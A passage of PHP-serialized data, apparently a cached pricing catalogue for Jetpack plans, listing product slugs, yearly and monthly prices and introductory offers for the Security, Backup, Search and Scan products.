Personal\";s:12:\"product_slug\";s:16:\"jetpack_personal\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$39.00\";s:21:\"combined_cost_display\";s:6:\"$39.00\";s:4:\"cost\";i:39;s:18:\"cost_smallest_unit\";i:3900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$3.25\";}s:24:\"jetpack_personal_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2006;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:24:\"jetpack_personal_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$3.50\";s:21:\"combined_cost_display\";s:5:\"$3.50\";s:4:\"cost\";d:3.5;s:18:\"cost_smallest_unit\";i:350;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_security_daily\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2010;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:22:\"jetpack_security_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:7:\"$299.00\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:149;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$24.92\";}s:30:\"jetpack_security_daily_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2011;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:30:\"jetpack_security_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$24.95\";s:21:\"combined_cost_display\";s:6:\"$24.95\";s:4:\"cost\";d:24.95;s:18:\"cost_smallest_unit\";i:2495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_security_realtime\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2012;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:25:\"jetpack_security_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$839.00\";s:21:\"combined_cost_display\";s:7:\"$839.00\";s:4:\"cost\";i:839;s:18:\"cost_smallest_unit\";i:83900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:419;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$69.92\";}s:33:\"jetpack_security_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2013;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:33:\"jetpack_security_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$69.95\";s:21:\"combined_cost_display\";s:6:\"$69.95\";s:4:\"cost\";d:69.95;s:18:\"cost_smallest_unit\";i:6995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_complete\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2014;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:16:\"jetpack_complete\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.40\";s:21:\"combined_cost_display\";s:7:\"$599.40\";s:4:\"cost\";d:599.4;s:18:\"cost_smallest_unit\";i:59940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:299.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$49.95\";}s:24:\"jetpack_complete_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2015;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:24:\"jetpack_complete_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.95;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2016;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.4;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:27:\"jetpack_security_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2017;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.95;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t2_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2019;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$899.40\";s:21:\"combined_cost_display\";s:7:\"$899.40\";s:4:\"cost\";d:899.4;s:18:\"cost_smallest_unit\";i:89940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:359.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$74.95\";}s:27:\"jetpack_security_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2020;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.95;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_starter_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2030;s:12:\"product_name\";s:15:\"Jetpack Starter\";s:12:\"product_slug\";s:22:\"jetpack_starter_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:15:\"jetpack-starter\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$71.40\";s:21:\"combined_cost_display\";s:6:\"$71.40\";s:4:\"cost\";d:71.4;s:18:\"cost_smallest_unit\";i:7140;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:47.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$5.95\";}s:23:\"jetpack_starter_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2031;s:12:\"product_name\";s:15:\"Jetpack Starter\";s:12:\"product_slug\";s:23:\"jetpack_starter_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:15:\"jetpack-starter\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.95\";s:21:\"combined_cost_display\";s:5:\"$8.95\";s:4:\"cost\";d:8.95;s:18:\"cost_smallest_unit\";i:895;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"jetpack_security_t1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2034;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:29:\"jetpack_security_t1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$478.80\";s:21:\"combined_cost_display\";s:7:\"$478.80\";s:4:\"cost\";d:478.8;s:18:\"cost_smallest_unit\";i:47880;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.05;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:41:\"jetpack_backup_addon_storage_10gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2040;s:12:\"product_name\";s:47:\"Jetpack VaultPress Backup Add-on Storage (10GB)\";s:12:\"product_slug\";s:41:\"jetpack_backup_addon_storage_10gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:33:\"jetpack-backup-addon-storage-10gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.95\";s:21:\"combined_cost_display\";s:5:\"$2.95\";s:4:\"cost\";d:2.95;s:18:\"cost_smallest_unit\";i:295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:42:\"jetpack_backup_addon_storage_100gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2044;s:12:\"product_name\";s:48:\"Jetpack VaultPress Backup Add-on Storage (100GB)\";s:12:\"product_slug\";s:42:\"jetpack_backup_addon_storage_100gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:34:\"jetpack-backup-addon-storage-100gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$5.95\";s:21:\"combined_cost_display\";s:5:\"$5.95\";s:4:\"cost\";d:5.95;s:18:\"cost_smallest_unit\";i:595;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_1tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2048;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (1TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_1tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-1tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.95;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_3tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2052;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (3TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_3tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-3tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$19.95\";s:21:\"combined_cost_display\";s:6:\"$19.95\";s:4:\"cost\";d:19.95;s:18:\"cost_smallest_unit\";i:1995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_5tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2056;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (5TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_5tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-5tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.95;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_backup_daily\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2100;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:20:\"jetpack_backup_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.00\";s:21:\"combined_cost_display\";s:7:\"$119.00\";s:4:\"cost\";i:119;s:18:\"cost_smallest_unit\";i:11900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:59;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$9.92\";}s:28:\"jetpack_backup_daily_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2101;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:28:\"jetpack_backup_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.95;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_realtime\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2102;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.00\";s:21:\"combined_cost_display\";s:7:\"$599.00\";s:4:\"cost\";i:599;s:18:\"cost_smallest_unit\";i:59900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:299;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$49.92\";}s:31:\"jetpack_backup_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2103;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:31:\"jetpack_backup_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$49.95\";s:21:\"combined_cost_display\";s:6:\"$49.95\";s:4:\"cost\";d:49.95;s:18:\"cost_smallest_unit\";i:4995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:14:\"jetpack_search\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2104;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:14:\"jetpack_search\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$99.00\";s:21:\"combined_cost_display\";s:6:\"$99.00\";s:4:\"cost\";i:99;s:18:\"cost_smallest_unit\";i:9900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:9900;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:1;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.25\";}s:22:\"jetpack_search_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2105;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:22:\"jetpack_search_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.95;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:1495;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:1;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:12:\"jetpack_scan\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2106;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:12:\"jetpack_scan\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.4;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:20:\"jetpack_scan_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2107;s:12:\"product_name\";s:18:\"Jetpack Scan 